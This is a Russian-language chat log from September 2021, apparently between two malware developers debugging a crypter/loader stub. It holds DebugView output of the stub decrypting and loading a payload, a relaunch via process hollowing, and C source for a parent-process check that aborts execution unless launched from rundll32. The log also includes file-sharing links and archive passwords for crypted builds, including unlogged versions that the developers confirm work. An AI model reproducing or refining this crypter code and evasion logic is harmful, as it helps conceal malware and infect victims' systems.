[06.09.21 12:43:26] elijah:		а куда крипт пишет логи? Где их найти?
[06.09.21 12:44:14] allen:		Запускаешь DebugView.....
[06.09.21 12:44:50] elijah:		спс, сейчас попробую
[06.09.21 12:48:43] elijah:		```
00000001	0.00000000	[5912] DllMain(DLL_PROCESS_ATTACH)	
00000002	0.00024570	[5912] CheckRun()...	
00000003	0.01392110	[2328] DllMain(DLL_PROCESS_ATTACH)	
00000004	0.01456890	[2328] CheckRun()...	
00000005	0.01870040	[2328] CheckRun() returns 0;	
00000006	0.02037830	[2328] Payload extracted and uncrypted;	
00000007	0.02046650	[2328] Loading library from payload; Calling EntryProc(DLL_PROCESS_ATTACH)	
00000008	10.94856071	[4416] DllMain(DLL_PROCESS_ATTACH)	
00000009	10.94862175	[4416] CheckRun()...	
00000010	10.96027470	[1764] DllMain(DLL_PROCESS_ATTACH)	
00000011	10.96038914	[1764] CheckRun()...	
00000012	10.96513271	[1764] CheckRun() returns 0;	
00000013	10.96683216	[1764] Payload extracted and uncrypted;	
00000014	10.96719170	[1764] Loading library from payload; Calling EntryProc(DLL_PROCESS_ATTACH)	
00000015	21.48033333	[4744] DllMain(DLL_PROCESS_ATTACH)	
00000016	21.48040199	[4744] CheckRun()...	
00000017	21.49256706	[1564] DllMain(DLL_PROCESS_ATTACH)	
00000018	21.49263954	[1564] CheckRun()...	
00000019	21.49611855	[1564] CheckRun() returns 0;	
00000020	21.49779701	[1564] Payload extracted and uncrypted;	
00000021	21.49786377	[1564] Loading library from payload; Calling EntryProc(DLL_PROCESS_ATTACH)	
00000022	22.72169495	[5948] DllMain(DLL_PROCESS_ATTACH)	
00000023	22.72187233	[5948] CheckRun()...	
00000024	22.73323822	[5948] CheckRun() returns 3;	

```
[06.09.21 12:48:53] elijah:		несколько перезапусков лоадера
[06.09.21 12:49:02] elijah:		и последний - перезапуск через холовинг
[06.09.21 12:50:11] allen:		Последний - рубится при проверке на родителя. Не тот!!!
[06.09.21 12:51:24] elijah:		А кто должен быть?
[06.09.21 12:51:52] allen:		static int CheckParent()
{
	int pid = -1;
	HANDLE hProcess;
	HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	tagPROCESSENTRY32 pe = { 0 };
	
	pe.dwSize = sizeof(tagPROCESSENTRY32);
	
	if (!strname)
		return 3;

	pid = GetCurrentProcessId();
	
	if (Process32First(h, &pe))
	{
		do
		{
			if (pe.th32ProcessID == pid)
			{
				hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe.th32ParentProcessID);
				if (hProcess != NULL)
				{
					HMODULE hMod;
					DWORD cbNeeded;
					CHAR processName[MAX_PATH];
					if (EnumProcessModules(hProcess, &hMod, sizeof(&hMod), &cbNeeded))
					{
						GetModuleBaseNameA(hProcess, hMod, processName, sizeof(processName) / sizeof(CHAR));
						CloseHandle(h);
						if (memcmp(strname, processName, strlen(strname)) == 0)
							return 0;
						return 3;
					}
				}
			}
		} while (Process32Next(h, &pe));
	}
	CloseHandle(h);
	return 3;
}
[06.09.21 12:52:21] allen:		Код функции проверки на parent'а.
[06.09.21 12:58:34] elijah:		```
if (memcmp(strname, processName, strlen(strname)) == 0)
return 0;
return 3;
```
[06.09.21 12:58:41] elijah:		какое значение должно быть у strname
[06.09.21 13:02:45] allen:		Имя запускаемого exe/
[06.09.21 13:03:21] allen:		Я веонусь минут через 45.
[06.09.21 13:43:21] allen:		Я тут. На месте.
[06.09.21 14:04:43] elijah:		Подскажи, насчет перезапуска твоего стаба. Вот он запускается через rundll32, сам перезапускает себя через rundll32 и вот тут проверяет, кто его родитель. Если не rundll32 - return 3. Так?
[06.09.21 14:05:07] allen:		Да
[06.09.21 14:06:36] elijah:		а если я запускаю его через холовинг, по идее, в первый раз он также должен перезапустить себя?
[06.09.21 14:06:52] allen:		Да.
[06.09.21 14:07:09] elijah:		а как он себя перезапускает? Через командную строку?
[06.09.21 14:07:17] allen:		Да
[06.09.21 14:08:20] allen:		До завтра, я думаю, чего-нибудь придумаю...
[06.09.21 14:11:11] elijah:		окей)
[07.09.21 06:28:09] allen:		Привет. Давай я тебе сделаю без проверки на парента.
[07.09.21 06:32:20] elijah:		Привет! Давай. От меня что-то нужно?
[07.09.21 06:32:36] allen:		Нет
[07.09.21 06:32:46] elijah:		ок, тогда жду)
[07.09.21 06:33:05] allen:		Так же с логированием.
[07.09.21 06:45:54] allen:		Пароль `LlksdjflsfoerooOoijoidfs978.zdf,mkl`
[07.09.21 06:46:07] allen:		https://file.io/4iUGkE8N7pCi
[07.09.21 06:52:10] elijah:		+
[07.09.21 07:53:45] elijah:		Крипты проверил. Оба работают
[07.09.21 07:54:17] allen:		Теперь тебе дать без логирования?
[07.09.21 07:58:57] elijah:		давай
[07.09.21 08:05:02] allen:		`LjlkdJLkjlkdjoeooOooooeoerwoicz`
https://file.io/asOKA6BZaGqa
[07.09.21 08:10:17] elijah:		+
[07.09.21 09:18:33] elijah:		нелогированные версии тоже работают
